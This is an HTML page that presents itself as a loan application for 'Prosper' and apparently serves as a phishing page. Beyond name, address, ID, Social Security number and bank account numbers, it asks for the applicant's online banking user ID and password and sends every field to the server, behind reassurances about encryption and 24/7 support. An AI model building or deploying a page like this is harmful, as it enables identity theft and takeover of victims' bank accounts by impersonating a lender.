<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Apply Now - Prosper</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"
      rel="stylesheet"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.css"
    />
    <link
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"
      rel="stylesheet"
    />
    <style>
      .prosper-blue {
        background-color: #0077be;
      }
      .prosper-dark {
        background-color: #333333;
      }
    </style>
  </head>
  <body class="bg-gray-100 font-sans">
    <!-- Header -->
    <header
      class="bg-gradient-to-r from-blue-600 to-blue-800 text-white shadow-lg"
    >
      <div
        class="container mx-auto px-4 py-4 flex justify-between items-center"
      >
        <a href="/" class="text-3xl font-bold"
          >PRO<span class="text-yellow-400">?</span>PER</a
        >
        <nav>
          <a
            href="#"
            class="bg-yellow-500 text-blue-900 px-6 py-2 rounded-full hover:bg-yellow-400 transition duration-300 font-semibold"
            >Returning Customer</a
          >
        </nav>
      </div>
    </header>

    <!-- Main Content -->
    <main class="container mx-auto px-4 py-12 flex flex-wrap">
      <div class="w-full lg:w-2/3 pr-0 lg:pr-8">
        <form id="Assign_Form" class="bg-white rounded-xl shadow-2xl p-8">
          <!-- Personal Details Section -->
          <section class="mb-10">
            <h2 class="text-2xl font-bold mb-6 text-blue-800">
              <i class="fas fa-user-circle mr-2"></i>Personal Details
            </h2>
            <p class="mb-6 text-gray-600">
              Let's start with your personal information...
            </p>
            <div class="grid grid-cols-1 md:grid-cols-2 gap-6">
              <div>
                <label
                  for="ddlServices"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Loan Amount</label
                >
                <select
                  id="ddlServices"
                  name="ddlServices"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                >
                  <option value="$ 2,000">$ 2,000</option>
                  <option value="$ 2,500">$ 2,500</option>
                  <option value="$ 3,000">$ 3,000</option>
                  <option value="$ 3,500">$ 3,500</option>
                  <option value="$ 4,000">$ 4,000</option>
                  <option value="$ 4,500">$ 4,500</option>
                  <option value="$ 5,000">$ 5,000</option>
                  <option value="$ 5,500">$ 5,500</option>
                  <option value="$ 6,000">$ 6,000</option>
                  <option value="$ 6,500">$ 6,500</option>
                  <option value="$ 7,000">$ 7,000</option>
                  <option value="$ 7,500">$ 7,500</option>
                  <option value="$ 8,000">$ 8,000</option>
                  <option value="$ 8,500">$ 8,500</option>
                  <option value="$ 9,000">$ 9,000</option>
                  <option value="$ 9,500">$ 9,500</option>
                  <option value="$ 10,000">$ 10,000</option>
                </select>
              </div>
              <div>
                <label
                  for="first_name"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Legal First Name</label
                >
                <input
                  type="text"
                  id="first_name"
                  name="first_name"
                  placeholder="Your first name"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="last_name"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Legal Last Name</label
                >
                <input
                  type="text"
                  id="last_name"
                  name="last_name"
                  placeholder="Your last name"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="email"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Email</label
                >
                <input
                  type="email"
                  id="email"
                  name="email"
                  placeholder="your.email@example.com"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="number"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Phone Number</label
                >
                <input
                  type="text"
                  id="number"
                  name="number"
                  placeholder="(123) 456-7890"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
            </div>
          </section>

          <!-- More Details Section -->
          <section class="mb-10">
            <h2 class="text-2xl font-bold mb-6 text-blue-800">
              <i class="fas fa-map-marker-alt mr-2"></i>Address Details
            </h2>
            <div class="grid grid-cols-1 md:grid-cols-2 gap-6">
              <div>
                <label
                  for="address"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Street Address</label
                >
                <input
                  type="text"
                  id="address"
                  name="address"
                  placeholder="123 Main St"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="city"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >City</label
                >
                <input
                  type="text"
                  id="city"
                  name="city"
                  placeholder="Your City"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="state"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >State</label
                >
                <input
                  type="text"
                  id="state"
                  name="state"
                  placeholder="Your State"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="Zip"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Zip Code</label
                >
                <input
                  type="text"
                  id="Zip"
                  name="Zip"
                  placeholder="12345"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="driving_licence"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Driver's License or Other ID</label
                >
                <input
                  type="text"
                  id="driving_licence"
                  name="driving_licence"
                  placeholder="DL12345678"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="driving_licence_state"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >License State</label
                >
                <select
                  id="driving_licence_state"
                  name="driving_licence_state"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                >
                  <option selected="selected" value="-1">Select State</option>
                  <option value="Alabama">Alabama</option>
                  <option value="Alaska">Alaska</option>
                  <option value="Arizona">Arizona</option>
                  <option value="Arkansas">Arkansas</option>
                  <option value="California">California</option>
                  <option value="Colorado">Colorado</option>
                  <option value="Connecticut">Connecticut</option>
                  <option value="Delaware">Delaware</option>
                  <option value="District of Columbia">
                    District of Columbia
                  </option>
                  <option value="Florida">Florida</option>
                  <option value="Georgia">Georgia</option>
                  <option value="Hawaii">Hawaii</option>
                  <option value="Idaho">Idaho</option>
                  <option value="Illinois">Illinois</option>
                  <option value="Indiana">Indiana</option>
                  <option value="Iowa">Iowa</option>
                  <option value="Kansas">Kansas</option>
                  <option value="Kentucky">Kentucky</option>
                  <option value="Louisiana">Louisiana</option>
                  <option value="Maine">Maine</option>
                  <option value="Maryland">Maryland</option>
                  <option value="Massachusetts">Massachusetts</option>
                  <option value="Michigan">Michigan</option>
                  <option value="Minnesota">Minnesota</option>
                  <option value="Mississippi">Mississippi</option>
                  <option value="Missouri">Missouri</option>
                  <option value="Montana">Montana</option>
                  <option value="Nebraska">Nebraska</option>
                  <option value="Nevada">Nevada</option>
                  <option value="New Hampshire">New Hampshire</option>
                  <option value="New Jersey">New Jersey</option>
                  <option value="New Mexico">New Mexico</option>
                  <option value="New York">New York</option>
                  <option value="North Carolina">North Carolina</option>
                  <option value="North Dakota">North Dakota</option>
                  <option value="Ohio">Ohio</option>
                  <option value="Oklahoma">Oklahoma</option>
                  <option value="Oregon">Oregon</option>
                  <option value="Pennsylvania">Pennsylvania</option>
                  <option value="Rhode Island">Rhode Island</option>
                  <option value="South Carolina">South Carolina</option>
                  <option value="South Dakota">South Dakota</option>
                  <option value="Tennessee">Tennessee</option>
                  <option value="Texas">Texas</option>
                  <option value="Utah">Utah</option>
                  <option value="Vermont">Vermont</option>
                  <option value="Virginia">Virginia</option>
                  <option value="Washington">Washington</option>
                  <option value="West Virginia">West Virginia</option>
                  <option value="Wisconsin">Wisconsin</option>
                  <option value="Wyoming">Wyoming</option>
                  <option value="Armed Forces Americas">
                    Armed Forces Americas
                  </option>
                  <option value="Armed Forces - Europe">
                    Armed Forces - Europe
                  </option>
                  <option value="Armed Forces - Pacific">
                    Armed Forces - Pacific
                  </option>
                  <option value="U.S. Minor Outlying Islands">
                    U.S. Minor Outlying Islands
                  </option>
                </select>
              </div>
            </div>
          </section>

          <!-- Identity Verification Section -->
          <section class="mb-10">
            <h2 class="text-2xl font-bold mb-6 text-blue-800">
              <i class="fas fa-id-card mr-2"></i>Identity Verification
            </h2>
            <div>
              <label
                for="ssn"
                class="block text-sm font-medium text-gray-700 mb-1"
                >Social Security Number</label
              >
              <input
                type="text"
                id="ssn"
                name="ssn"
                placeholder="XXX-XX-XXXX"
                pattern="\d{3}-?\d{2}-?\d{4}"
                minlength="9"
                maxlength="9"
                class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                required
              />
            </div>
          </section>

          <!-- Bank Account Info Section -->
          <section class="mb-10">
            <h2 class="text-2xl font-bold mb-6 text-blue-800">
              <i class="fas fa-university mr-2"></i>Bank Account Information
            </h2>
            <div class="grid grid-cols-1 md:grid-cols-2 gap-6">
              <div>
                <label
                  for="routing"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >ABA/Routing Number</label
                >
                <input
                  type="number"
                  id="routing"
                  name="routing"
                  placeholder="123456789"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  minlength="9"
                  maxlength="9"
                  required
                />
              </div>
              <div>
                <label
                  for="bank_name"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Bank Name</label
                >
                <input
                  type="text"
                  id="bank_name"
                  name="bank_name"
                  placeholder="Your Bank"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="AC_number"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Account Number</label
                >
                <input
                  type="text"
                  id="AC_number"
                  name="AC_number"
                  placeholder="1234567890"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="mobile_onuserid"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Mobile/Online User ID</label
                >
                <input
                  type="text"
                  id="mobile_onuserid"
                  name="mobile_onuserid"
                  placeholder="Your User ID"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
              <div>
                <label
                  for="mobile_onlinepassword"
                  class="block text-sm font-medium text-gray-700 mb-1"
                  >Mobile/Online Password</label
                >
                <input
                  type="password"
                  id="mobile_onlinepassword"
                  name="mobile_onlinepassword"
                  placeholder="••••••••"
                  class="w-full py-3 px-4 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent"
                  required
                />
              </div>
            </div>
          </section>

          <!-- Terms and Submit -->
          <section>
            <div class="flex items-start mb-6">
              <input
                type="checkbox"
                id="cbkterms"
                name="cbkterms"
                class="mt-1 h-5 w-5 text-blue-600 focus:ring-blue-500 border-gray-300 rounded"
              />
              <label for="cbkterms" class="ml-3 block text-sm text-gray-700">
                I consent to receive calls, texts and pre-recorded messages from
                prosperloan.services, and its lending and/or network partners.
                Message and data rates may apply.**
              </label>
            </div>
            <button
              type="submit"
              id="mybtn"
              name="btnsubmit"
              class="w-full bg-blue-600 text-white py-4 px-6 rounded-lg text-lg font-semibold hover:bg-blue-700 transition duration-300 shadow-lg"
            >
              Submit Application
            </button>
          </section>
        </form>

        <div class="mt-8 text-sm text-gray-600">
          <p>
            By clicking Submit, I agree to receive important notices and other
            communications electronically. Terms & Conditions and Privacy Policy
            apply.
          </p>
          <p class="mt-4">
            ** Message Frequency: 2 msgs/week. I understand I may opt-out of SMS
            communication by replying 'STOP' or 'HELP' for more information, or
            by contacting contact@prosperloan.services. Consent to receive texts
            and calls is not required as a condition of purchasing any products
            or services. See SMS Policy for more details. I certify that I am a
            US resident over 18, and all information submitted with this loan
            request is true and accurate to the best of my knowledge.
          </p>
        </div>
      </div>

      <!-- Need Help Section -->
      <div class="w-full lg:w-1/3 mt-8 lg:mt-0">
        <div
          class="bg-gradient-to-br from-blue-500 to-blue-700 text-white p-8 rounded-xl shadow-xl"
        >
          <h2 class="text-3xl font-bold mb-6">Need Help?</h2>
          <p class="mb-6 text-lg">
            If you're unsure about any field, refer to this section for detailed
            instructions.
          </p>
          <div class="mt-8">
            <div class="flex items-center mb-6">
              <i class="fas fa-lock text-4xl mr-4 text-yellow-400"></i>
              <p class="text-lg">
                We use 256-bit SSL encryption and strict security measures to
                keep your information safe and secure.
              </p>
            </div>
            <div class="flex items-center">
              <i class="fas fa-headset text-4xl mr-4 text-yellow-400"></i>
              <p class="text-lg">
                Our support team is available 24/7 to assist you with any
                questions or concerns.
              </p>
            </div>
          </div>
        </div>
      </div>
    </main>

    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script>
    <script>
      $(document).ready(function () {
        // Configure toastr options
        toastr.options = {
          closeButton: true,
          debug: false,
          newestOnTop: false,
          progressBar: true,
          positionClass: 'toast-bottom-right',
          preventDuplicates: false,
          onclick: null,
          showDuration: '300',
          hideDuration: '1000',
          timeOut: '5000',
          extendedTimeOut: '1000',
          showEasing: 'swing',
          hideEasing: 'linear',
          showMethod: 'fadeIn',
          hideMethod: 'fadeOut',
        };

        $('#Assign_Form').on('submit', function (e) {
          e.preventDefault();
          $("[id$='_error']").empty();
          var val = $('#Assign_Form').serialize();

          var url = '/apply';
          var method_type = 'POST';
          $.ajax({
            url: url,
            type: method_type,
            data: $('#Assign_Form').serialize(),
            dataType: 'json',

            success: function (result) {
              console.log('result in ajax', result);

              if ((val = 'submit')) {
                toastr.success(result.message, 'Success!', {
                  timeOut: 5000,
                  closeButton: true,
                  progressBar: true,
                  positionClass: 'toast-bottom-right',
                });

                setTimeout(function () {
                  window.location.href = '/';
                }, 5000);
              }
            },

            error: function (errors) {
              toastr.error('An error occurred. Please try again.', 'Error!', {
                timeOut: 5000,
                closeButton: true,
                progressBar: true,
                positionClass: 'toast-bottom-right',
              });
              // You can add more specific error handling here if needed
            },
          });
        });
      });
    </script>
  </body>
</html>
